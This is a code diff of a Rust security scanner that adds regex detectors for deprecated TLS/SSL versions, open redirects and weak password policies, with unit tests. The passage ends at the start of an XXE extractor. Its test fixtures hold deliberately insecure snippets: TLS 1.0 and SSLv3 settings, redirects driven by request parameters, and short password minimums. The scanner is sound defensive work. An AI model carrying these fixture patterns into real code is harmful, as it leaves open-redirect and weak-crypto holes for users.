// Covers common patterns: TLS_MIN_VERSION, MIN_TLS_VERSION, SSL_VERSION, sslVersion, tlsMinVersion
// Pattern 1: (tls|ssl) followed by min/version (e.g., TLS_MIN_VERSION, ssl_version)
// Pattern 2: (min|version) followed by tls/ssl (e.g., MIN_TLS, VERSION_SSL)
// Pattern 3: camelCase (e.g., sslVersion, tlsMinVersion, minTlsVersion)
// Value must be terminated by a quote, whitespace, semicolon, or end of input to avoid matching "TLS1_2" as "TLS1"
// Allow optional type annotations (e.g., Rust `: &str`) between name and value
semantic_tls_version: Regex::new(
r#"(?i)\b(?:(?:tls|ssl)[_A-Z]*(?:min(?:imum)?|version)|(?:min(?:imum)?|version)[_A-Z]*(?:tls|ssl)|(?:tls|ssl)[A-Z][a-z]*(?:Version|Min)|(?:min|version)[A-Z][a-z]*(?:Tls|Ssl))\w*(?:\s*:\s*[^=]+)?\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)(?:["'\s;]|$)"#,
)
.expect("valid regex"),
// Environment variables (NAME=value, with optional export)
// Catches: TLS_MIN_VERSION=1.0, export SSL_VERSION=TLSv1
// The `m` flag anchors `^`/`$` at line boundaries, so the pattern still matches when run over multi-line content
env_tls_version: Regex::new(
r#"(?im)^(?:export\s+)?(\w*(?:tls|ssl)\w*(?:_?(?:min|version))+\w*)\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)["']?\s*$"#,
)
.expect("valid regex"),
// Terraform HCL patterns
// Catches: min_tls_version = "TLS1_0", ssl_minimum_protocol_version = "TLSv1"
// The name allows an optional min/minimum and protocol part after tls/ssl, so both forms above match
// The value must be a complete deprecated version, terminated by a quote, whitespace, or end of input
terraform_tls: Regex::new(
r#"(?i)(?:min(?:imum)?_)?(?:tls|ssl)_?(?:min(?:imum)?_)?(?:protocol_)?version\s*=\s*["']?(?:TLS_?1_?[01]|TLSv1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)(?:["'\s]|$)"#,
)
.expect("valid regex"),
// Kubernetes camelCase patterns (YAML)
// Catches: minTLSVersion: VersionTLS10, tlsMinVersion: "1.0"
// The value must not be followed by a word character or dot, so "TLSv1.2" is not matched as "TLSv1"
k8s_tls: Regex::new(
r#"(?i)(?:min)?(?:tls|ssl)(?:Min)?(?:Version|Protocol)\s*:\s*["']?(?:VersionTLS1[01]|VersionSSL30|TLSv?1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)(?:[^\w.]|$)"#,
)
.expect("valid regex"),
}
}
@ -141,6 +187,8 @@ impl Extractor for TlsVersionExtractor {
Language::Yaml,
Language::Toml,
Language::Json,
Language::Terraform,
Language::Dotenv,
]
}
@ -267,214 +315,56 @@ impl Extractor for TlsVersionExtractor {
"deprecated",
"Deprecated TLS version in configuration (RFC 8996)",
));
// Kubernetes camelCase patterns for YAML
if language == Language::Yaml {
claims.extend(self.check_pattern(
content,
&self.k8s_tls,
path_segments,
file,
"deprecated",
"Kubernetes minTLSVersion set to deprecated value (RFC 8996)",
));
}
}
Language::Terraform => {
claims.extend(self.check_pattern(
content,
&self.terraform_tls,
path_segments,
file,
"deprecated",
"Terraform TLS configuration uses deprecated version (RFC 8996)",
));
}
Language::Dotenv => {
claims.extend(self.check_pattern(
content,
&self.env_tls_version,
path_segments,
file,
"deprecated",
"Environment variable sets deprecated TLS version (RFC 8996)",
));
}
_ => {}
}
// Apply semantic pattern to all languages (cross-language)
// This catches patterns like: const TLS_MIN_VERSION = "1.0"
claims.extend(self.check_pattern(
content,
&self.semantic_tls_version,
path_segments,
file,
"deprecated",
"Semantic: Variable name suggests TLS version, value is deprecated (RFC 8996)",
));
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_rust_tls10_detection() {
let extractor = TlsVersionExtractor::new();
// Content with TLS10 on two lines - should find 2 matches
let content = r#"
use rustls::version::TLS10;
config.min_protocol_version = Some(TLS10);
"#;
let claims =
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
// Both lines match TLS10 pattern
assert_eq!(claims.len(), 2);
assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
}
#[test]
fn test_rust_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
let version = TLS1_1;
"#;
let claims =
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_go_version_tls10_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS10,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_go_version_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS11,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_python_tls_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
import ssl
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "server.py");
// Should detect both TLSv1 and TLSv1_1
assert_eq!(claims.len(), 2);
}
#[test]
fn test_js_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const server = https.createServer({
minVersion: 'TLSv1',
key: fs.readFileSync('key.pem')
});
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_js_secure_protocol_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const options = {
secureProtocol: 'TLSv1_method'
};
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_yaml_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.0"
cert_file: /etc/certs/server.crt
"#;
let claims = extractor.extract(
&["config".to_string()],
content,
Language::Yaml,
"config/production.yaml",
);
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
}
#[test]
fn test_yaml_tls_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
server:
tls_min_version: TLSv1.1
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS12,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_tls13() {
let extractor = TlsVersionExtractor::new();
let content = r#"
use rustls::version::TLS13;
config.min_protocol_version = Some(TLS13);
"#;
let claims =
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_modern_config() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.2"
max_version: "1.3"
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert!(claims.is_empty());
}
#[test]
fn test_concept_path_structure() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{MinVersion: tls.VersionTLS10}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("tls/min_version"));
}
}
#[path = "tls_version_tests.rs"]
mod tests;

@ -0,0 +1,362 @@
//! Tests for TLS version extractor.
use super::tls_version::TlsVersionExtractor;
use super::Extractor;
use crate::types::Language;
use stemedb_core::types::ObjectValue;
#[test]
fn test_rust_tls10_detection() {
let extractor = TlsVersionExtractor::new();
// Content with TLS10 on two lines - should find 2 matches
let content = r#"
use rustls::version::TLS10;
config.min_protocol_version = Some(TLS10);
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
// Both lines match TLS10 pattern
assert_eq!(claims.len(), 2);
assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
}
#[test]
fn test_rust_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
let version = TLS1_1;
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_go_version_tls10_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS10,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_go_version_tls11_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS11,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}
#[test]
fn test_python_tls_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
import ssl
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
"#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "server.py");
// Should detect both TLSv1 and TLSv1_1
assert_eq!(claims.len(), 2);
}
#[test]
fn test_js_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const server = https.createServer({
minVersion: 'TLSv1',
key: fs.readFileSync('key.pem')
});
"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}
#[test]
fn test_js_secure_protocol_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
const options = {
secureProtocol: 'TLSv1_method'
};
"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_yaml_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.0"
cert_file: /etc/certs/server.crt
"#;
let claims = extractor.extract(
&["config".to_string()],
content,
Language::Yaml,
"config/production.yaml",
);
assert_eq!(claims.len(), 1);
assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
}
#[test]
fn test_yaml_tls_min_version_detection() {
let extractor = TlsVersionExtractor::new();
let content = r#"
server:
tls_min_version: TLSv1.1
"#;
let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
// May match both config pattern and semantic pattern
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.value == ObjectValue::Text("deprecated".to_string())));
}
#[test]
fn test_no_false_positives_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{
MinVersion: tls.VersionTLS12,
}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_tls13() {
let extractor = TlsVersionExtractor::new();
let content = r#"
use rustls::version::TLS13;
config.min_protocol_version = Some(TLS13);
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_modern_config() {
let extractor = TlsVersionExtractor::new();
let content = r#"
tls:
min_version: "1.2"
max_version: "1.3"
"#;
let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert!(claims.is_empty());
}
#[test]
fn test_concept_path_structure() {
let extractor = TlsVersionExtractor::new();
let content = r#"
cfg := &tls.Config{MinVersion: tls.VersionTLS10}
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("tls/min_version"));
}
// ===== Phase 8.4: Semantic TLS Version Detection Tests =====
#[test]
fn test_semantic_const_rust() {
let extractor = TlsVersionExtractor::new();
let content = r#"const TLS_MIN_VERSION: &str = "1.0";"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}
#[test]
fn test_semantic_let_js() {
let extractor = TlsVersionExtractor::new();
let content = r#"let sslVersion = "TLSv1";"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "config.js");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}
#[test]
fn test_semantic_assignment_python() {
let extractor = TlsVersionExtractor::new();
let content = r#"TLS_MINIMUM_VERSION = "1.1""#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
}
#[test]
fn test_semantic_ssl_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"const SSL_VERSION = "SSLv3";"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/ssl.rs");
assert!(!claims.is_empty());
}
#[test]
fn test_env_tls_version() {
let extractor = TlsVersionExtractor::new();
let content = "TLS_MIN_VERSION=1.0";
let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Environment variable")));
}
#[test]
fn test_env_export_ssl() {
let extractor = TlsVersionExtractor::new();
let content = "export SSL_VERSION=TLSv1";
let claims =
extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env.production");
assert!(!claims.is_empty());
}
#[test]
fn test_terraform_min_tls_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"min_tls_version = "TLS1_0""#;
let claims =
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Terraform")));
}
#[test]
fn test_terraform_ssl_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"ssl_minimum_protocol_version = "TLSv1""#;
let claims =
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "variables.tf");
assert!(!claims.is_empty());
}
#[test]
fn test_k8s_min_tls_version() {
let extractor = TlsVersionExtractor::new();
let content = r#"
apiVersion: v1
kind: Config
spec:
minTLSVersion: VersionTLS10
"#;
let claims =
extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");
assert!(!claims.is_empty());
assert!(claims.iter().any(|c| c.description.contains("Kubernetes")));
}
#[test]
fn test_k8s_tls_min_version_camel() {
let extractor = TlsVersionExtractor::new();
let content = r#"tlsMinVersion: "1.0""#;
let claims = extractor.extract(&["k8s".to_string()], content, Language::Yaml, "ingress.yaml");
assert!(!claims.is_empty());
}
#[test]
fn test_no_false_positive_semantic_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"const TLS_MIN_VERSION = "1.2";"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");
// TLS 1.2 is safe, should not match semantic pattern
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positive_env_tls13() {
let extractor = TlsVersionExtractor::new();
let content = "TLS_VERSION=1.3";
let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");
// TLS 1.3 is safe, should not match
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positive_terraform_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"min_tls_version = "TLS1_2""#;
let claims =
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");
// TLS 1.2 is safe
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positive_k8s_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"minTLSVersion: VersionTLS12"#;
let claims =
extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");
// TLS 1.2 is safe
assert!(claims.is_empty());
}


@ -0,0 +1,301 @@
//! Unvalidated redirects vulnerability extractor.
//!
//! Detects patterns where HTTP redirects use user-controlled input
//! without proper validation, which can lead to open redirect attacks.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for unvalidated redirect vulnerabilities.
///
/// Detects patterns indicating unsafe redirect handling:
/// - redirect() with user-controlled URLs
/// - window.location assignment with user input
/// - URL parameters named redirect/return/next/goto
pub struct UnvalidatedRedirectsExtractor {
// Python patterns
python_redirect: Regex,
python_flask_redirect: Regex,
// JavaScript/TypeScript patterns
js_redirect: Regex,
js_location: Regex,
// Go patterns
go_redirect: Regex,
// Universal URL parameter patterns
url_param: Regex,
}
impl Default for UnvalidatedRedirectsExtractor {
fn default() -> Self {
Self::new()
}
}
impl UnvalidatedRedirectsExtractor {
/// Create a new unvalidated redirects extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
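// Python: redirect with user input. `url\b` still matches a bare `url`
// argument but skips Flask's `url_for(...)`, which resolves a route name
// rather than user input.
python_redirect: Regex::new(
r#"(?:redirect|HttpResponseRedirect)\s*\(\s*(?:request\.(?:GET|POST|args)|url\b|next|return_url)"#,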
)
.expect("valid regex"),
python_flask_redirect: Regex::new(
r#"redirect\s*\(\s*request\.(?:args|form)\.get\s*\("#,
)
.expect("valid regex"),
// JavaScript: redirect with user input
js_redirect: Regex::new(
r#"res\.redirect\s*\(\s*(?:req\.(?:query|params|body)\.|url|next)"#,
)
.expect("valid regex"),
js_location: Regex::new(
r#"(?:window\.)?location(?:\.href)?\s*=\s*(?:url|params|query|req\.)"#,
)
.expect("valid regex"),
// Go: http.Redirect with user input
go_redirect: Regex::new(
r#"http\.Redirect\s*\([^,]*,\s*[^,]*,\s*(?:r\.|req\.|c\.)"#,
)
.expect("valid regex"),
// Universal: dangerous URL parameter patterns
url_param: Regex::new(
r#"(?i)(?:redirect|return|next|goto|url|continue)(?:_url|Uri|_to)?\s*[:=]\s*(?:req\.|request\.|params\.)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["http", "redirect", category],
"redirect_source",
ObjectValue::Text("user_controlled".to_string()),
file,
line,
matched,
0.85,
description,
)
}
}
impl Extractor for UnvalidatedRedirectsExtractor {
fn name(&self) -> &str {
"unvalidated_redirects"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for dangerous URL parameter patterns (all languages)
if let Some(m) = self.url_param.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"url_parameter",
"Redirect URL from user-controlled parameter (open redirect risk)",
));
}
// Language-specific patterns
match language {
Language::Python => {
// Check the more specific Flask pattern first so that a line such as
// `redirect(request.args.get("next"))` produces one claim, not two.
if let Some(m) = self.python_flask_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"Flask redirect with request parameter (open redirect risk)",
));
} else if let Some(m) = self.python_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"Redirect with user-controlled URL (open redirect risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
if let Some(m) = self.js_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"res.redirect with user input (open redirect risk)",
));
}
if let Some(m) = self.js_location.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"client_side",
"window.location assignment with user input (open redirect risk)",
));
}
}
Language::Go => {
if let Some(m) = self.go_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"http.Redirect with user input (open redirect risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
return redirect(request.GET['next'])
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("http/redirect"));
}
#[test]
fn test_python_flask_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
return redirect(request.form.get('destination'))
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
// Should match the flask redirect pattern (redirect + request.form.get)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
res.redirect(req.query.next);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_location() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
window.location = url;
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("window.location"));
}
#[test]
fn test_go_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
http.Redirect(w, r, r.URL.Query().Get("next"), http.StatusFound)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_url_param_pattern() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
redirect_url = request.args.get("redirect")
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
// Should match the url_param pattern (redirect_url = request.)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_static_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
// Safe: static redirect URL
let content = r#"
res.redirect('/login');
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert!(claims.is_empty());
}
}


@ -0,0 +1,344 @@
//! Weak password requirements extractor.
//!
//! Detects patterns where password policies are too weak,
//! such as minimum length < 8, bcrypt cost < 10, or missing complexity requirements.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for weak password requirement configurations.
///
/// Detects patterns indicating insufficient password policies:
/// - Minimum password length < 8 characters
/// - Bcrypt cost/rounds < 10
/// - Complexity requirements disabled
pub struct WeakPasswordExtractor {
// Minimum length too short (< 8)
min_length_weak: Regex,
min_length_config: Regex,
// Bcrypt cost too low (< 10)
bcrypt_weak: Regex,
// Simple length check in code
simple_check: Regex,
// Special chars not required
no_special: Regex,
no_uppercase: Regex,
no_number: Regex,
}
impl Default for WeakPasswordExtractor {
fn default() -> Self {
Self::new()
}
}
impl WeakPasswordExtractor {
/// Create a new weak password extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Minimum length too short (< 8) in various config formats
min_length_weak: Regex::new(
r#"(?i)(?:min[_-]?(?:password[_-]?)?length|password[_-]?min(?:[_-]?length)?)\s*[:=]\s*[1-7](?:\D|$)"#,
)
.expect("valid regex"),
min_length_config: Regex::new(
r#"(?i)["']?(?:minLength|min_length|minimumLength)["']?\s*[:=]\s*[1-7](?:\D|$)"#,
)
.expect("valid regex"),
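// Hashing work factor below 10. The threshold is tuned for bcrypt; Argon2
// time costs of 2-3 are normal and will also match this pattern.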
bcrypt_weak: Regex::new(
r#"(?i)(?:bcrypt|hash|argon2?|scrypt).*(?:cost|rounds|iterations)\s*[:=]\s*[1-9](?:\D|$)"#,
)
.expect("valid regex"),
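// Simple length check in code that accepts passwords shorter than 8:
// `>= N` for N in 1..=7, or `> N` for N in 0..=6 (`> 7` already enforces 8).
simple_check: Regex::new(
r#"len\s*\(\s*password\s*\)\s*(?:>=\s*[1-7]|>\s*[0-6])(?:\D|$)"#,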
)
.expect("valid regex"),
// Complexity requirements disabled
no_special: Regex::new(
r#"(?i)require[_-]?(?:special|symbol)[_-]?(?:char)?s?\s*[:=]\s*(?:false|no|0)"#,
)
.expect("valid regex"),
no_uppercase: Regex::new(
r#"(?i)require[_-]?(?:upper|uppercase)[_-]?(?:case)?\s*[:=]\s*(?:false|no|0)"#,
)
.expect("valid regex"),
no_number: Regex::new(
r#"(?i)require[_-]?(?:number|digit)s?\s*[:=]\s*(?:false|no|0)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
value: ObjectValue,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["auth", "password", "policy", category],
"requirement_strength",
value,
file,
line,
matched,
0.9,
description,
)
}
}
impl Extractor for WeakPasswordExtractor {
fn name(&self) -> &str {
"weak_password"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Rust,
Language::Yaml,
Language::Json,
Language::Toml,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
_language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for weak minimum length
if let Some(m) = self.min_length_weak.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"min_length",
ObjectValue::Text("weak".to_string()),
"Minimum password length < 8 characters (should be at least 8)",
));
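} else if let Some(m) = self.min_length_config.find(line) {
// Reached only when min_length_weak did not match; a key such as
// `min_length: 6` satisfies both patterns and would otherwise be reported twice.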
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"min_length",
ObjectValue::Text("weak".to_string()),
"Minimum password length < 8 characters (should be at least 8)",
));
}
// Check for weak bcrypt cost
if let Some(m) = self.bcrypt_weak.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"hash_cost",
ObjectValue::Text("weak".to_string()),
"Password hashing cost/rounds < 10 (should be at least 10 for bcrypt)",
));
}
// Check for simple length validation
if let Some(m) = self.simple_check.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"validation",
ObjectValue::Text("weak".to_string()),
"Password validation allows < 8 characters",
));
}
// Check for disabled complexity requirements
if let Some(m) = self.no_special.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"complexity",
ObjectValue::Boolean(false),
"Special character requirement disabled",
));
}
if let Some(m) = self.no_uppercase.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"complexity",
ObjectValue::Boolean(false),
"Uppercase requirement disabled",
));
}
if let Some(m) = self.no_number.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"complexity",
ObjectValue::Boolean(false),
"Number/digit requirement disabled",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_weak_min_length_yaml() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
password_min: 6
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
// Should match min_length_weak pattern
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("auth/password/policy"));
}
#[test]
fn test_weak_min_length_json() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
"minLength": 4
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Json, "config.json");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_weak_bcrypt_cost() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
bcrypt_cost = 8
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("cost/rounds"));
}
#[test]
fn test_simple_length_check() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
if len(password) >= 6:
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "auth.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_special_chars() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
require_special_chars: false
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Special character"));
}
#[test]
fn test_no_uppercase() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
require_uppercase = false
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_strong() {
let extractor = WeakPasswordExtractor::new();
// Strong: min length >= 8
let content = r#"
password_min_length: 12
bcrypt_cost: 12
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
assert!(claims.is_empty());
}
#[test]
fn test_boundary_value_8() {
let extractor = WeakPasswordExtractor::new();
// Boundary: exactly 8 should be OK
let content = r#"
password_min_length: 8
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
assert!(claims.is_empty());
}
}


@ -0,0 +1,432 @@
//! XML External Entity (XXE) vulnerability extractor.
//!
